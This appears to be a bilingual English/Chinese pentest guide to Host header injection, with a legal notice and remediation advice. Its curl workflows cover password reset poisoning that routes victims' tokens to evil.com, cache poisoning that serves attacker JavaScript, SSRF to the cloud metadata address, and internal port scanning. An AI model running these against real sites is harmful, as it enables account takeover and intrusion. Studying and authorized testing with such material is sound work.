Back to Details

testing-for-host-header-injection

Compare original and translation side by side

🇺🇸

Original

English
🇨🇳

Translation

Chinese

Testing for Host Header Injection

测试HTTP Host头注入

When to Use

适用场景

  • When testing password reset functionality for token theft via host manipulation
  • During assessment of web caching behavior influenced by Host header values
  • When testing virtual host routing and server-side request processing
  • During penetration testing of applications behind reverse proxies or load balancers
  • When evaluating SSRF potential through Host header manipulation
  • 测试密码重置功能时,通过操纵Host头窃取令牌
  • 评估受Host头值影响的Web缓存行为时
  • 测试虚拟主机路由和服务器端请求处理时
  • 对反向代理或负载均衡器后的应用程序进行渗透测试时
  • 通过操纵Host头评估SSRF潜在风险时

Prerequisites

前提条件

  • Burp Suite for intercepting and modifying Host headers
  • Understanding of HTTP Host header role in virtual hosting and routing
  • Knowledge of alternative host headers (X-Forwarded-Host, X-Host, X-Original-URL)
  • Access to an attacker-controlled domain for receiving poisoned requests
  • Burp Collaborator or interact.sh for out-of-band detection
  • Multiple test accounts for password reset testing
Legal Notice: This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.
  • 用于拦截和修改Host头的Burp Suite
  • 了解HTTP Host头在虚拟主机和路由中的作用
  • 了解替代Host头(X-Forwarded-Host、X-Host、X-Original-URL)
  • 可访问攻击者控制的域名以接收被劫持的请求
  • 用于带外检测的Burp Collaborator或interact.sh
  • 多个用于密码重置测试的测试账户
法律声明: 本技能仅用于授权的安全测试和教育目的。未经授权对不属于您或未获得书面测试许可的系统进行使用是非法的,可能违反计算机欺诈相关法律。

Workflow

测试流程

Step 1 — Test Basic Host Header Injection

步骤1 — 测试基础Host头注入

bash
undefined
bash
undefined

Supply arbitrary Host header

Supply arbitrary Host header

curl -H "Host: evil.com" http://target.com/ -v
curl -H "Host: evil.com" http://target.com/ -v

Check if application reflects evil.com in response

Check if application reflects evil.com in response

Double Host header

Double Host header

curl -H "Host: target.com" -H "Host: evil.com" http://target.com/ -v
curl -H "Host: target.com" -H "Host: evil.com" http://target.com/ -v

Host header with port injection

Host header with port injection

curl -H "Host: target.com:evil.com" http://target.com/ -v curl -H "Host: target.com:@evil.com" http://target.com/ -v
curl -H "Host: target.com:evil.com" http://target.com/ -v curl -H "Host: target.com:@evil.com" http://target.com/ -v

Absolute URL with different Host

Absolute URL with different Host

curl --request-target "http://target.com/" -H "Host: evil.com" http://target.com/ -v
curl --request-target "http://target.com/" -H "Host: evil.com" http://target.com/ -v

Check for different virtual host access

Check for different virtual host access

curl -H "Host: admin.target.com" http://target.com/ -v curl -H "Host: internal.target.com" http://target.com/ -v curl -H "Host: localhost" http://target.com/ -v
undefined
curl -H "Host: admin.target.com" http://target.com/ -v curl -H "Host: internal.target.com" http://target.com/ -v curl -H "Host: localhost" http://target.com/ -v
undefined

Step 2 — Test Password Reset Poisoning

步骤2 — 测试密码重置劫持

bash
undefined
bash
undefined

Trigger password reset with modified Host header

Trigger password reset with modified Host header

The reset link may use the Host header value in the URL

The reset link may use the Host header value in the URL

curl -X POST http://target.com/forgot-password
-H "Host: evil.com"
-d "email=victim@target.com"
curl -X POST http://target.com/forgot-password
-H "Host: evil.com"
-d "email=victim@target.com"

If reset email contains: http://evil.com/reset?token=xxx

If reset email contains: http://evil.com/reset?token=xxx

Attacker receives the token when victim clicks the link

Attacker receives the token when victim clicks the link

Try X-Forwarded-Host for password reset poisoning

Try X-Forwarded-Host for password reset poisoning

curl -X POST http://target.com/forgot-password
-H "X-Forwarded-Host: evil.com"
-d "email=victim@target.com"
curl -X POST http://target.com/forgot-password
-H "X-Forwarded-Host: evil.com"
-d "email=victim@target.com"

Port-based injection in reset URL

Port-based injection in reset URL

curl -X POST http://target.com/forgot-password
-H "Host: target.com:80@evil.com"
-d "email=victim@target.com"
curl -X POST http://target.com/forgot-password
-H "Host: target.com:80@evil.com"
-d "email=victim@target.com"

Test with various forwarding headers

Test with various forwarding headers

for header in "X-Forwarded-Host" "X-Host" "X-Original-URL" "X-Rewrite-URL" "X-Forwarded-Server" "Forwarded"; do curl -X POST http://target.com/forgot-password
-H "$header: evil.com"
-d "email=victim@target.com" echo "Tested: $header" done
undefined
for header in "X-Forwarded-Host" "X-Host" "X-Original-URL" "X-Rewrite-URL" "X-Forwarded-Server" "Forwarded"; do curl -X POST http://target.com/forgot-password
-H "$header: evil.com"
-d "email=victim@target.com" echo "Tested: $header" done
undefined

Step 3 — Test Web Cache Poisoning via Host Header

步骤3 — 测试基于Host头的Web缓存投毒

bash
undefined
bash
undefined

If caching layer uses URL (without Host) as cache key:

If caching layer uses URL (without Host) as cache key:

Poison cache with modified Host header

Poison cache with modified Host header

curl -H "Host: evil.com" http://target.com/ -v
curl -H "Host: evil.com" http://target.com/ -v

If response is cached and contains evil.com links

If response is cached and contains evil.com links

All subsequent users receive poisoned content

All subsequent users receive poisoned content

Test with X-Forwarded-Host for cache poisoning

Test with X-Forwarded-Host for cache poisoning

curl -H "X-Forwarded-Host: evil.com" http://target.com/login -v
curl -H "X-Forwarded-Host: evil.com" http://target.com/login -v

Check X-Cache header to see if response was cached

Check X-Cache header to see if response was cached

Verify cache poisoning

Verify cache poisoning

curl http://target.com/login -v
curl http://target.com/login -v

If response still contains evil.com, cache is poisoned

If response still contains evil.com, cache is poisoned

Poison JavaScript URLs in cached pages

Poison JavaScript URLs in cached pages

curl -H "X-Forwarded-Host: evil.com" http://target.com/
curl -H "X-Forwarded-Host: evil.com" http://target.com/

If page loads: <script src="//evil.com/static/app.js">

If page loads: <script src="//evil.com/static/app.js">

Attacker serves malicious JavaScript to all users

Attacker serves malicious JavaScript to all users

undefined
undefined

Step 4 — Test SSRF via Host Header

步骤4 — 测试基于Host头的SSRF

bash
undefined
bash
undefined

Backend may use Host header to make internal requests

Backend may use Host header to make internal requests

curl -H "Host: internal-api.target.local" http://target.com/api/proxy
curl -H "Host: internal-api.target.local" http://target.com/api/proxy

Access cloud metadata via Host header

Access cloud metadata via Host header

curl -H "Host: 169.254.169.254" http://target.com/
curl -H "Host: 169.254.169.254" http://target.com/

Internal port scanning

Internal port scanning

for port in 80 443 8080 8443 3000 5000 9200; do curl -H "Host: 127.0.0.1:$port" http://target.com/ -o /dev/null -w "%{http_code}" -s echo " - Port $port" done
for port in 80 443 8080 8443 3000 5000 9200; do curl -H "Host: 127.0.0.1:$port" http://target.com/ -o /dev/null -w "%{http_code}" -s echo " - Port $port" done

SSRF via absolute URL

SSRF via absolute URL

curl --request-target "http://internal-server/" -H "Host: internal-server" http://target.com/
undefined
curl --request-target "http://internal-server/" -H "Host: internal-server" http://target.com/
undefined

Step 5 — Test Virtual Host Enumeration

步骤5 — 测试虚拟主机枚举

bash
undefined
bash
undefined

Enumerate virtual hosts

Enumerate virtual hosts

for vhost in admin staging dev test api internal backend; do status=$(curl -H "Host: $vhost.target.com" http://target.com/ -o /dev/null -w "%{http_code}" -s) size=$(curl -H "Host: $vhost.target.com" http://target.com/ -o /dev/null -w "%{size_download}" -s) echo "$vhost.target.com - Status: $status, Size: $size" done
for vhost in admin staging dev test api internal backend; do status=$(curl -H "Host: $vhost.target.com" http://target.com/ -o /dev/null -w "%{http_code}" -s) size=$(curl -H "Host: $vhost.target.com" http://target.com/ -o /dev/null -w "%{size_download}" -s) echo "$vhost.target.com - Status: $status, Size: $size" done

Check default virtual host behavior

Check default virtual host behavior

curl -H "Host: nonexistent.target.com" http://target.com/ -v
curl -H "Host: nonexistent.target.com" http://target.com/ -v

Compare with legitimate host response

Compare with legitimate host response

Access internal admin panels via virtual host

Access internal admin panels via virtual host

curl -H "Host: admin" http://target.com/ curl -H "Host: management.internal" http://target.com/
undefined
curl -H "Host: admin" http://target.com/ curl -H "Host: management.internal" http://target.com/
undefined

Step 6 — Test Connection-State Attacks

步骤6 — 测试连接状态攻击

bash
undefined
bash
undefined

HTTP/1.1 connection reuse attack

HTTP/1.1 connection reuse attack

Send legitimate first request, then inject Host header on subsequent request

Send legitimate first request, then inject Host header on subsequent request

Use Burp Repeater with "Update Content-Length" and manual Connection: keep-alive

Use Burp Repeater with "Update Content-Length" and manual Connection: keep-alive

In Burp Repeater, send grouped request:

In Burp Repeater, send grouped request:

Request 1 (legitimate):

Request 1 (legitimate):

GET / HTTP/1.1

GET / HTTP/1.1

Host: target.com

Host: target.com

Connection: keep-alive

Connection: keep-alive

Request 2 (injected):

Request 2 (injected):

GET /admin HTTP/1.1

GET /admin HTTP/1.1

Host: internal.target.com

Host: internal.target.com

Test with HTTP Request Smuggling combined

Test with HTTP Request Smuggling combined

If front-end validates Host but back-end doesn't:

If front-end validates Host but back-end doesn't:

Smuggle request with modified Host header

Smuggle request with modified Host header

undefined
undefined

Key Concepts

核心概念

ConceptDescription
Host HeaderHTTP header specifying the target virtual host for the request
Password Reset PoisoningInjecting Host to make reset emails contain attacker-controlled URLs
Cache Poisoning via HostPoisoning CDN cache with responses containing attacker-controlled host
Virtual Host RoutingWeb server using Host header to route requests to different applications
X-Forwarded-HostAlternative header used by proxies that may override Host header
Connection State AttackExploiting persistent connections to send requests with different Host values
Server-Side Host ResolutionBackend code using Host header for URL generation and redirects
概念说明
Host HeaderHTTP头,指定请求的目标虚拟主机
Password Reset Poisoning注入Host头,使重置邮件包含攻击者控制的URL
Cache Poisoning via Host用包含攻击者控制主机的响应投毒CDN缓存
Virtual Host RoutingWeb服务器使用Host头将请求路由到不同应用程序
X-Forwarded-Host代理使用的替代头,可能覆盖Host头
Connection State Attack利用持久连接发送带有不同Host值的请求
Server-Side Host Resolution后端代码使用Host头生成URL和重定向

Tools & Systems

工具与系统

ToolPurpose
Burp SuiteHTTP proxy for Host header manipulation and analysis
Burp CollaboratorOut-of-band detection for Host header SSRF
ffufVirtual host brute-forcing with custom Host headers
gobuster vhostVirtual host enumeration mode
NucleiTemplate-based scanning for Host header injection
param-minerBurp extension for discovering unkeyed Host-related headers
工具用途
Burp Suite用于Host头操纵和分析的HTTP代理
Burp Collaborator用于Host头SSRF的带外检测
ffuf自定义Host头的虚拟主机暴力破解
gobuster vhost虚拟主机枚举模式
Nuclei基于模板的Host头注入扫描
param-miner用于发现未关联Host相关头的Burp扩展

Common Scenarios

常见场景

  1. Password Reset Token Theft — Poison Host header during password reset to make victim click a link pointing to attacker server, leaking reset token
  2. Web Cache Poisoning — Inject Host header to cache responses with attacker-controlled JavaScript URLs, achieving stored XSS for all users
  3. Internal Panel Access — Enumerate and access internal admin panels through virtual host manipulation
  4. SSRF to Cloud Metadata — Use Host header to redirect server-side requests to cloud metadata endpoints
  5. Routing Bypass — Bypass access controls by manipulating Host to route requests to unprotected backend instances
  1. 密码重置令牌窃取 — 在密码重置过程中注入Host头,使受害者点击指向攻击者服务器的链接,从而泄露重置令牌
  2. Web缓存投毒 — 注入Host头,缓存包含攻击者控制的JavaScript URL的响应,为所有用户实现存储型XSS
  3. 内部面板访问 — 通过虚拟主机操纵枚举并访问内部管理面板
  4. SSRF访问云元数据 — 使用Host头将服务器端请求重定向到云元数据端点
  5. 路由绕过 — 通过操纵Host头将请求路由到未受保护的后端实例,绕过访问控制

Output Format

输出格式

undefined
undefined

Host Header Injection Report

Host Header Injection Report

Findings

Findings

#TechniqueHeaderImpactSeverity
1Password Reset PoisoningHost: evil.comToken theftCritical
2Cache PoisoningX-Forwarded-Host: evil.comStored XSSHigh
3Virtual Host AccessHost: admin.target.comAdmin panel exposureHigh
4SSRFHost: 169.254.169.254Metadata accessCritical
#TechniqueHeaderImpactSeverity
1Password Reset PoisoningHost: evil.comToken theftCritical
2Cache PoisoningX-Forwarded-Host: evil.comStored XSSHigh
3Virtual Host AccessHost: admin.target.comAdmin panel exposureHigh
4SSRFHost: 169.254.169.254Metadata accessCritical

Remediation

Remediation

  • Validate Host header against a whitelist of expected values
  • Do not use Host header for generating URLs in password reset emails
  • Configure web server to reject requests with unrecognized Host values
  • Set absolute URLs in application configuration instead of deriving from Host
undefined
  • Validate Host header against a whitelist of expected values
  • Do not use Host header for generating URLs in password reset emails
  • Configure web server to reject requests with unrecognized Host values
  • Set absolute URLs in application configuration instead of deriving from Host
undefined